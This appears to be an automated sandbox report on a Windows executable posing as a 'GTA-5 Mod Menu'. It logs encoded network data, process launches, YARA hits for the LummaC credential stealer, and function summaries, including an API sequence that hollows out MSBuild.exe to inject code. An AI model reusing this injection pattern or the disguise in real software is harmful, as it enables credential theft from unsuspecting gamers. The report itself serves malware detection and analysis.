2024-12-30 19:41:11 UTC	1369	IN	Data Raw: 6c 45 56 6b 67 44 46 56 4e 66 78 4b 62 52 50 6d 45 43 79 6d 53 49 57 69 5a 39 76 49 31 71 74 54 32 4f 64 59 65 77 49 2b 38 45 39 66 55 72 4c 41 4d 42 6f 72 4d 59 78 35 6a 4b 69 48 5a 43 69 4d 6d 76 65 6f 6e 4d 56 52 35 4d 6c 57 37 6c 65 34 51 69 4a 79 30 46 5a 63 38 63 41 79 45 6d 6b 33 54 4c 67 52 4c 6b 31 6f 36 70 58 46 75 4f 6e 52 79 74 54 6d 54 46 46 6a 6b 50 4e 4f 34 65 66 58 55 35 57 6d 69 61 79 57 63 58 69 43 37 46 43 71 6a 75 66 76 77 38 4a 6a 59 56 36 4a 32 57 67 48 77 2b 77 51 63 45 73 73 39 74 70 53 55 2f 6b 66 63 38 73 6d 4f 51 4d 76 45 2b 59 51 4c 4b 5a 49 68 61 4a 6e 32 38 6d 59 37 78 47 63 4a 68 73 7a 56 4c 7a 78 7a 39 5a 53 5a 73 50 76 48 69 52 32 43 72 48 53 4a 74 42 6a 71 45 51 4c 59 6e 65 41 54 70 78 6e 43 31 48 6a 6c 76 54 4a 6f 6e 4c Data Ascii: lEVkgDFVNfxKbRPmECymSIWiZ9vI1qtT2OdYewI+8E9fUrLAMBorMYx5jKiHZCiMmveonMVR5MlW7le4QiJy0FZc8cAyEmk3TLgRLk1o6pXFuOnRytTmTFFjkPNO4efXU5WmiayWcXiC7FCqjufvw8JjYV6J2WgHw+wQcEss9tpSU/kfc8smOQMvE+YQLKZIhaJn28mY7xGcJhszVLzxz9ZSZsPvHiR2CrHSJtBjqEQLYneATpxnC1HjlvTJonL
2024-12-30 19:41:11 UTC	1369	IN	Data Raw: 30 4d 2b 6c 75 6c 33 51 6a 72 59 49 4a 45 33 5a 6b 55 4c 74 53 4c 59 79 64 5a 72 43 52 69 75 30 4b 4c 4f 49 58 51 5a 48 46 43 77 77 79 39 53 4c 36 64 47 4d 41 2f 70 52 6d 2f 2f 67 34 57 6a 74 38 4f 43 69 65 52 4c 6b 47 6e 63 39 31 53 71 4d 64 66 4c 6d 6a 4f 42 38 46 46 6e 6f 49 6f 72 7a 36 38 50 49 6d 51 54 6a 6d 4b 73 6c 70 54 53 74 6f 57 65 35 68 4f 2b 6a 32 43 6e 6d 56 72 45 73 77 38 76 47 65 76 35 6a 48 31 62 70 49 79 30 59 73 33 41 64 65 43 52 41 35 68 72 41 52 50 33 53 54 39 45 70 65 63 59 48 30 56 6b 68 2f 6e 53 36 54 78 45 64 49 2f 34 68 69 64 70 56 51 78 79 70 64 51 55 33 65 39 58 45 4f 6c 5a 4d 77 34 39 64 42 34 54 68 61 52 45 72 68 35 72 76 77 54 38 7a 69 6a 41 59 66 6e 44 41 36 4c 31 6c 45 78 49 5a 45 44 41 59 46 63 2b 78 76 31 34 6d 39 7a 64 Data Ascii: 0M+lul3QjrYIJE3ZkULtSLYydZrCRiu0KLOIXQZHFCwwy9SL6dGMA/pRm//g4Wjt8OCieRLkGnc91SqMdfLmjOB8FFnoIorz68PImQTjmKslpTStoWe5hO+j2CnmVrEsw8vGev5jH1bpIy0Ys3AdeCRA5hrARP3ST9EpecYH0Vkh/nS6TxEdI/4hidpVQxypdQU3e9XEOlZMw49dB4ThaRErh5rvwT8zijAYfnDA6L1lExIZEDAYFc+xv14m9zd
2024-12-30 19:41:11 UTC	1369	IN	Data Raw: 35 68 50 78 71 35 54 2b 7a 42 34 4b 30 4b 51 6e 6a 6b 32 49 62 55 4a 30 62 58 4a 70 47 34 51 69 5a 2f 56 52 30 54 63 59 33 78 31 71 77 32 67 7a 42 59 75 49 73 78 35 51 6a 49 59 69 6a 58 51 5a 6b 6d 51 35 77 75 46 4c 61 41 6f 7a 59 57 6c 46 33 35 54 76 59 51 64 4f 48 4f 75 4e 6d 68 68 6d 4e 6e 46 41 77 79 72 39 47 56 30 65 68 4c 31 61 5a 64 2f 67 4d 6f 50 39 36 4b 42 6a 36 47 2f 67 6c 71 4e 38 66 73 47 61 61 49 72 47 76 4b 77 7a 6e 79 57 45 59 52 61 4d 76 62 64 78 5a 2f 43 2b 54 78 6a 6f 75 56 63 55 46 7a 6b 6d 30 77 57 33 4f 56 76 38 67 6a 71 51 4d 41 59 2b 65 52 69 51 6a 6e 6b 4e 32 6d 45 7a 74 58 35 44 50 57 33 68 51 35 32 48 62 53 4a 65 4f 45 73 70 46 73 68 61 71 67 77 30 69 2b 49 64 34 53 58 33 48 47 46 75 65 50 2b 77 35 71 66 39 47 54 6b 61 55 59 4f Data Ascii: 5hPxq5T+zB4K0KQnjk2IbUJ0bXJpG4QiZ/VR0TcY3x1qw2gzBYuIsx5QjIYijXQZkmQ5wuFLaAozYWlF35TvYQdOHOuNmhhmNnFAwyr9GV0ehL1aZd/gMoP96KBj6G/glqN8fsGaaIrGvKwznyWEYRaMvbdxZ/C+TxjouVcUFzkm0wW3OVv8gjqQMAY+eRiQjnkN2mEztX5DPW3hQ52HbSJeOEspFshaqgw0i+Id4SX3HGFueP+w5qf9GTkaUYO

Target ID:	0
Start time:	14:40:56
Start date:	30/12/2024
Path:	C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe"
Imagebase:	0xf80000
File size:	820'736 bytes
MD5 hash:	97098E0B103ACDF642B87D2B96155992
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:40:56
Start date:	30/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:40:57
Start date:	30/12/2024
Path:	C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe"
Imagebase:	0xf80000
File size:	820'736 bytes
MD5 hash:	97098E0B103ACDF642B87D2B96155992
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	14:40:57
Start date:	30/12/2024
Path:	C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe"
Imagebase:	0xf80000
File size:	820'736 bytes
MD5 hash:	97098E0B103ACDF642B87D2B96155992
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000004.00000003.2202494460.0000000003593000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.2163534118.000000000358A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	8.1%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	1.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	26

Executed Functions

Function 00FB019E Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00FB0110,00FB0100), ref: 00FB0334
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00FB0347
Wow64GetThreadContext.KERNEL32(00000094,00000000), ref: 00FB0365
ReadProcessMemory.KERNELBASE(00000090,?,00FB0154,00000004,00000000), ref: 00FB0389
VirtualAllocEx.KERNELBASE(00000090,?,?,00003000,00000040), ref: 00FB03B4
TerminateProcess.KERNELBASE(00000090,00000000), ref: 00FB03D3
WriteProcessMemory.KERNELBASE(00000090,00000000,?,?,00000000,?), ref: 00FB040C
WriteProcessMemory.KERNELBASE(00000090,00400000,?,?,00000000,?,00000028), ref: 00FB0457
WriteProcessMemory.KERNELBASE(00000090,?,?,00000004,00000000), ref: 00FB0495
Wow64SetThreadContext.KERNEL32(00000094,00AB0000), ref: 00FB04D1
ResumeThread.KERNELBASE(00000094), ref: 00FB04E0

Strings

ReadProcessMemory, xrefs: 00FB0289
WriteProcessMemory, xrefs: 00FB02AF
VirtualAllocEx, xrefs: 00FB029C
GetP, xrefs: 00FB021E
Load, xrefs: 00FB01DA
TerminateProcess, xrefs: 00FB03C3
VirtualAlloc, xrefs: 00FB0263
ResumeThread, xrefs: 00FB02D8
aryA, xrefs: 00FB01E2
ress, xrefs: 00FB0226
GetThreadContext, xrefs: 00FB0276
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 00FB0333
CreateProcessW, xrefs: 00FB0250
SetThreadContext, xrefs: 00FB02C2

Memory Dump Source

Source File: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2440066154-3857624555
Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction ID: 08eb09a10c978d7ec9ef17f669047277af9dd48a8b257bc026e6e2c8b1a6b9a2
Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction Fuzzy Hash: E5B1077264064AAFDB60CF69CC80BDA73A5FF88724F158124EA0CAB341D774FA51CB94

Function 00F81C10 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 108
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 00F81C3B
CreateFileA.KERNELBASE ref: 00F81C94
GetFileSize.KERNEL32 ref: 00F81CC3
CloseHandle.KERNEL32 ref: 00F81CDF

Strings

CreateFileA, xrefs: 00F81C2E

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: File$AddressCloseCreateHandleProcSize
String ID: CreateFileA
API String ID: 2547132502-1429953656
Opcode ID: 8b8a758aaafe803d3057e0e932a3bed6317a12aee16b5af2f69458797472e9b0
Instruction ID: 852fbb8ee6ba40f2327faa3b6b20eeeb886fb59715bb8ffa4edb3fe3267f904e
Opcode Fuzzy Hash: 8b8a758aaafe803d3057e0e932a3bed6317a12aee16b5af2f69458797472e9b0
Instruction Fuzzy Hash: EF41A5B1D082099FCB00EFA8D49879EBBF0BF49314F008529E899A7350D7789945DF92

Function 00F96602 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,EDB057DF,?,00F96711,00000000,00000000,00000000,00000000), ref: 00F966C3

Strings

ext-ms-, xrefs: 00F9666D
api-ms-, xrefs: 00F96659

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 0cfbaa8e950179300541a9f106c299b00caf4e615857ee14baab1125214c21e3
Instruction ID: 97e9d84ae089510a5c08ec6ba82b14b9eb0c227958f019faed2653b44d70f808
Opcode Fuzzy Hash: 0cfbaa8e950179300541a9f106c299b00caf4e615857ee14baab1125214c21e3
Instruction Fuzzy Hash: 5521E772E01219ABEF319B659C44A5B3768AB467B0F250214FD05EB290EB74ED00FAD1

Function 00F96DEA Relevance: 7.7, APIs: 5, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__alloca_probe_16.LIBCMT ref: 00F96E6F
__alloca_probe_16.LIBCMT ref: 00F96F38
__freea.LIBCMT ref: 00F96F9F

Part of subcall function 00F956B1: RtlAllocateHeap.NTDLL(00000000,00F97635,?,?,00F97635,00000220,?,?,?), ref: 00F956E3

__freea.LIBCMT ref: 00F96FB2
__freea.LIBCMT ref: 00F96FBF

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: e265b308054650751f51a9a03056a2bd04dd1231945ff9dfde47b5f4227b5e28
Instruction ID: 4769d611c48bb634048a6d65c61e5afc0289393d879ea464a069f123c62d78a4
Opcode Fuzzy Hash: e265b308054650751f51a9a03056a2bd04dd1231945ff9dfde47b5f4227b5e28
Instruction Fuzzy Hash: 195197729002066FFF219E65EC45EBB76A9DF44728F150129FD08D6241FB75DC10B7A0

Function 00F81DB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 00F81E6E
VirtualProtect.KERNELBASE ref: 00F81EC3

Strings

VirtualProtect, xrefs: 00F81E61
@, xrefs: 00F81EB7

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: AddressProcProtectVirtual
String ID: @$VirtualProtect
API String ID: 3759838892-29487290
Opcode ID: a5ce620f7789add63d321d081f2fc6aef5f0192c1daf5d7f73e275a691072fa7
Instruction ID: e7c224b8d8855387e409e117010beecc30fb3daa5ce2c357557c1872a0c11d0b
Opcode Fuzzy Hash: a5ce620f7789add63d321d081f2fc6aef5f0192c1daf5d7f73e275a691072fa7
Instruction Fuzzy Hash: CA41D1B0901209DFDB04EFA9D9986DEBBF0FF48354F10851AE848AB350D779A985DF81

Function 00F8F253 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00F8F160,?,00F8F315,00000000,?,?,00F8F160,EDB057DF,?,00F8F160), ref: 00F8F264
TerminateProcess.KERNEL32(00000000,?,00F8F315,00000000,?,?,00F8F160,EDB057DF,?,00F8F160), ref: 00F8F26B
ExitProcess.KERNEL32 ref: 00F8F27D

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: ff1cb08daa51a431fed24c31acc80b253f7947f16468b30b9a014448e1c2e6af
Instruction ID: 74e45ec7dde753e0381f10ad2c2ecd8a6d2978964e930b241eb9692c5b59dbea
Opcode Fuzzy Hash: ff1cb08daa51a431fed24c31acc80b253f7947f16468b30b9a014448e1c2e6af
Instruction Fuzzy Hash: B7D092B600060CAFCF013F60DC0D89D3F6AEF4A761B984064B9095A131CB3A995AFB81

Function 00F9D364 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F9D70E: GetConsoleOutputCP.KERNEL32(EDB057DF,00000000,00000000,?), ref: 00F9D771

WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,00F8D7F2,?,00F8DA54), ref: 00F9D4E9
GetLastError.KERNEL32(?,00F8D7F2,?,00F8DA54,?,00F8DA54,?,?,?,?,?,?,?,00000000,?,?), ref: 00F9D4F3

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: f1ebb849ad4a2a09fd593c3914deb772cf0cd37993b1503cc3620d55dd720f96
Instruction ID: 8a1ce2dc4236d10eeec34c1dd5b6b9d58feced4449ec807d20621b6b6312be8e
Opcode Fuzzy Hash: f1ebb849ad4a2a09fd593c3914deb772cf0cd37993b1503cc3620d55dd720f96
Instruction Fuzzy Hash: 5C61C4B2D00119AFEF11DFA8CC84EFEBBB9AF49318F240145E904A7256D335D941EBA1

Function 00F97268 Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F9746D: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 00F97498

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00F97678,?,00000000,?,?,?), ref: 00F972C9
GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F97678,?,00000000,?,?,?), ref: 00F97305

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 1aba620ed5f05ff48b0e712f63359af76b9e59ba480cd21aabdbf7ce293d9f11
Instruction ID: e79c42c50b29e98cf08f013696029f0cfd6b05b4d9844d3a5ead68c0271e2815
Opcode Fuzzy Hash: 1aba620ed5f05ff48b0e712f63359af76b9e59ba480cd21aabdbf7ce293d9f11
Instruction Fuzzy Hash: 39513470E183458EEF20EF75C881AAABBF5FF41310F18446ED48687242E6749945FF90

Function 00F9DB3D Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00F9D4CF,?,00F8DA54,?,?,?,00000000), ref: 00F9DBD9
GetLastError.KERNEL32(?,00F9D4CF,?,00F8DA54,?,?,?,00000000,?,?,?,?,?,00F8D7F2,?,00F8DA54), ref: 00F9DBFF

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 9fa44953b92f0909605fbcc26895cbe2ac5afd7f76e6e56790a521efd64276e6
Instruction ID: 1ada3d8c46acb36e779c2492bf3c8d3ab6082e47c174d541d2443c15648afd88
Opcode Fuzzy Hash: 9fa44953b92f0909605fbcc26895cbe2ac5afd7f76e6e56790a521efd64276e6
Instruction Fuzzy Hash: 65219135A002199BDF19DF29DC80AE9B7B9FB88305F2441A9E946D7251D730ED42DF60

Function 00F97152 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,00F97041,00FAFCD8,0000000C), ref: 00F9719E
GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,00F97041,00FAFCD8,0000000C), ref: 00F971B0

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 337b55ce26c259f29cd0f7532adc8f512cbb153b5cd7e76a08b3c680ac2cd961
Instruction ID: c0ae0e900bb5420f438c9831141562b59c744c67630c6f6e8e0d705325062d21
Opcode Fuzzy Hash: 337b55ce26c259f29cd0f7532adc8f512cbb153b5cd7e76a08b3c680ac2cd961
Instruction Fuzzy Hash: C811D67292C7818BEF306E3F8C88B227AA4A752370B380759D5B6865F1D234D8C6F641

Function 00F82010 Relevance: 3.0, APIs: 2, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 00F82038
GetModuleFileNameW.KERNEL32 ref: 00F82058

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: Module$FileHandleName
String ID:
API String ID: 4146042529-0
Opcode ID: c12183af03f5f7b4a5856dcf074f401a15cd265dbf1c93378c095bb6cce19814
Instruction ID: ac54c20dc3fece82805fc3fdc0f7723300cb21b4a6f50f377704910bf30677ec
Opcode Fuzzy Hash: c12183af03f5f7b4a5856dcf074f401a15cd265dbf1c93378c095bb6cce19814
Instruction Fuzzy Hash: 54011AB09052088FCB14EF68D94929EBBF8BF08304F4145ADE48983341EB349A889F92

Function 00F964B3 Relevance: 3.0, APIs: 2, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringEx.KERNELBASE(?,00F96EDA,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 00F964E7
